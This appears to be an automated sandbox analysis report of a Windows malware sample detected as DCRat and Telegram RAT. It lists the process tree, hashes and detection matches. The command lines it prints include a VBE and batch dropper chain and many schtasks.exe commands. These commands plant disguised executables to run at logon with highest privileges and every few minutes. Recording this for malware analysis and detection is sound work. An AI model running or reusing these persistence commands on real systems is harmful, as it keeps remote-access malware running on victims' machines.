                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:12:06:54
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\6uPVRnocVS.exe"
                                                                                            Imagebase:0xf0000
                                                                                            File size:2'180'702 bytes
                                                                                            MD5 hash:7A193E404A6285A41ABA3019479D1749
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:12:06:55
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe"
                                                                                            Imagebase:0x80000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:12:07:05
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:12:07:05
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:12:07:05
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\ProgramData\ssh\System.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\\ProgramData\ssh\System.exe"
                                                                                            Imagebase:0xcf0000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1800682479.000000000329F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1800682479.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1803403382.000000001306D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 81%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:13
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:17
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:18
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:19
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:20
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\Idle.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:21
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:22
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:23
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:24
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:25
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:26
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Recovery\upfc.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:27
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:28
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:29
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:30
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Recovery\Idle.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Recovery\Idle.exe
                                                                                            Imagebase:0x230000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 81%, ReversingLabs
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:31
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:32
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:33
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Recovery\Idle.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Recovery\Idle.exe
                                                                                            Imagebase:0x50000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.1896236954.0000000002401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:34
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
                                                                                            Imagebase:0x2c0000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.1886936604.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.1886936604.00000000026BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 81%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:35
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:36
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.1893402647.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.1893402647.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:37
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:38
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:41
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
